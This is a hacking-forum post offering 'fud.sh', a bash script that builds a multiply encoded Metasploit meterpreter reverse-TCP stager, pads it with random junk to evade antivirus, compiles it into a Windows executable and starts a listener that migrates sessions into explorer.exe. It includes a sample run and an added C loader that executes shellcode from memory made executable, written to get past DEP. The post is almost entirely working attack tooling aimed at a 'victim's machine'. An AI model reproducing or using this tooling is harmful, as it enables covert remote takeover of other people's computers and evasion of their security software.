exploit a system outside a network :)

Code :

#!/bin/bash
# fud.sh - wraps an msfencode'd meterpreter stager in a C stub padded with
# random string literals, cross-compiles it with MinGW and starts the handler.
# Note: msfpayload, msfencode and msfcli were removed from Metasploit in 2015.
# On a current framework the same chain is built with msfvenom (-e/-i for the
# encoders, -f c for C output) and the handler started with msfconsole -x.
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                                                            "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "
echo "             http://anonymous1769.blogspot.in/              "
echo "************************************************************"

rm -rf ShellCode

echo -e "1) LanIP \n2) WanIP?"
read netchoice
case $netchoice in
1)      echo "Here is a network device list available on your machine"
        tr -s ' ' < /proc/net/dev | cut -d ' ' -f1,2 | sed -e '1,2d'
        echo -e "What network interface are we gonna use ?  \c"
        read interface
        # expects the old net-tools ifconfig format ("inet addr:10.0.0.5 ...")
        IP=$(ifconfig "$interface" | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1 }');;
2)      echo -e "======Getting your WAN IP========="
        IP=$(wget -q -O - http://checkip.dyndns.org | cut -d ':' -f2 | cut -d '<' -f1 | cut -d ' ' -f2);;
esac
echo "$IP"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber

# Encoder chain: every msfencode stage re-encodes the raw output of the one
# before it. The last stage emits msfencode's Ruby format ("buf = " followed
# by quoted lines joined with "+"), which the sed commands below rely on.
msfpayload windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$port" EXITFUNC=thread R \
  | msfencode -e x86/shikata_ga_nai -c "$enumber" -t raw \
  | msfencode -e x86/jmp_call_additive -c "$enumber" -t raw \
  | msfencode -e x86/call4_dword_xor -c "$enumber" -t raw \
  | msfencode -e x86/shikata_ga_nai -c "$enumber" -t ruby > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode || exit 1

# Turn the Ruby buffer into a C array: drop the '+' signs that join the
# string lines (adjacent C string literals concatenate on their own) and
# rename "buf = " to the C declaration.
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c

# Emit a C array holding $seed random numbers as adjacent string literals.
# The arrays are never referenced; they only change the binary's size and
# hash. Only the first $seed sorted lines are kept, so the iteration count
# mostly decides how long the loop takes (the second one, 999999, is slow).
junk_array() {   # junk_array <name> <iterations>
    echo "unsigned char $1[]="
    for (( i=1; i<=$2; i++ )); do echo "$RANDOM $i"; done \
        | sort -k1 | cut -d ' ' -f2 | head -n "$seed" | sed -e 's/^/"/' -e 's/$/"/'
    echo ';'
}

# The generated program needs no header: it only declares arrays and jumps
# into one of them (a bare "#include" line with no header name does not compile).
{
    junk_array ufs 10000
    cat ready.c
    echo ";"
    # Calls the encoded stager in place, i.e. executes out of the .data
    # section. This only works while DEP is not enforced for the process.
    echo "int main(void) { ((void (*)())micro)();}"
    junk_array tap 999999
} > final.c

#Cleanup
rm -f clean.c test.c ready.c

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1 || { echo "compile failed"; exit 1; }
filex="$RANDOM.exe"
mv final.exe "$filex"
# Strip before hashing, otherwise the printed checksum is not the checksum
# of the file that is actually shipped.
strip --strip-debug "$filex"
sumx=$(sha1sum "$filex" | cut -d ' ' -f1)
echo "$filex ...generated in ShellCode subfolder"
echo "$filex sha1checksum is .. $sumx"
cd ..
echo "      starting the meterpreter listener..."
sleep 2
# Meterpreter scripts are invoked by name (no .rb suffix); the handler
# migrates every new session into explorer.exe.
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$port" AutoRunScript='migrate -n explorer.exe' E

Save the file as fud.sh, make it executable and run it:
Code :

root@t3amas5assin:~/Desktop# chmod +x fud.sh
root@t3amas5assin:~/Desktop# ./fud.sh
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT         
                                                            
  With some Randomic gravy and sauce to bypass Antivirus    
             http://anonymous1769.blogspot.in/              
************************************************************
1) LanIP 
2) WanIP?
2
======Getting your WAN IP=========
114.79.135.104
What Port Number are we gonna listen to? : 5676
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 1000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
31963.exe ...generated in ShellCode subfolder
31963.exe sha1checksum is.. 675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe
      starting the meterpreter listener...

As soon as the payload is executed on the victim's machine and the session comes back, the handler's AutoRunScript migrates it into the explorer.exe process, so the session survives if the dropped executable exits or is killed.
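One thing worth knowing about the generated final.c: its main() jumps straight into micro[], a global array that lives in the executable's .data section. That works only while the process runs without DEP. The old MinGW toolchain used here did not mark its binaries DEP-compatible by default, so under the client-Windows "OptIn" policy the cast runs, but with DEP enforced (OptOut/AlwaysOn, or a hardened image) the call faults. The loader below is an added example and not code from the original post: it copies the buffer into memory it has explicitly made executable, flipping the page from writable to read+execute before the call, using VirtualAlloc/VirtualProtect on Windows and mmap/mprotect elsewhere. The six-byte micro[] is a constructed stand-in (mov eax,42 ; ret on x86 and x86-64) so the program can be run and checked without a handler; run_shellcode and run_embedded are names chosen for this example.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <unistd.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif
#endif

/* Constructed stand-in for the msfencode'd micro[] buffer of the script:
 * on x86 and x86-64 these six bytes are "mov eax, 42 ; ret", so calling
 * them returns 42 instead of connecting back to a handler. */
static const unsigned char micro[] = "\xb8\x2a\x00\x00\x00\xc3";
static const size_t micro_len = sizeof(micro) - 1;   /* drop the string NUL */

typedef int (*sc_fn)(void);

/* Copy `code` into a fresh writable mapping, flip it to read+execute, run
 * it and return whatever it returns. Returns -1 if the mapping or the
 * protection change fails. Never asks for a writable+executable page. */
int run_shellcode(const unsigned char *code, size_t len)
{
    int rc;
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL)
        return -1;
    memcpy(mem, code, len);
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return -1;
    }
    rc = ((sc_fn)(uintptr_t)mem)();
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t size = (len + page - 1) & ~(page - 1);   /* round up to whole pages */
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return -1;
    }
    rc = ((sc_fn)(uintptr_t)mem)();
    munmap(mem, size);
#endif
    return rc;
}

/* Same job as the script's `((void (*)())micro)();`, but through an
 * executable mapping instead of jumping into the .data section. */
int run_embedded(void)
{
    return run_shellcode(micro, micro_len);
}

int main(void)
{
    printf("shellcode returned %d\n", run_embedded());
    return 0;
}
```

Build it with the same cross-compiler as the script (i586-mingw32msvc-gcc loader.c -o loader.exe) or natively with gcc; in the script the bytes between the quotes would be the msfencode output, and the junk arrays can stay exactly as they are.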

dj mak

At the time of writing the payload was flagged by very few antivirus engines. Bear in mind that the encoders used here (shikata_ga_nai and friends) were written to avoid bad characters, not to evade detection, and encoded meterpreter stagers have long since been picked up by most engines, so treat the result as a snapshot of what worked then rather than a current bypass.
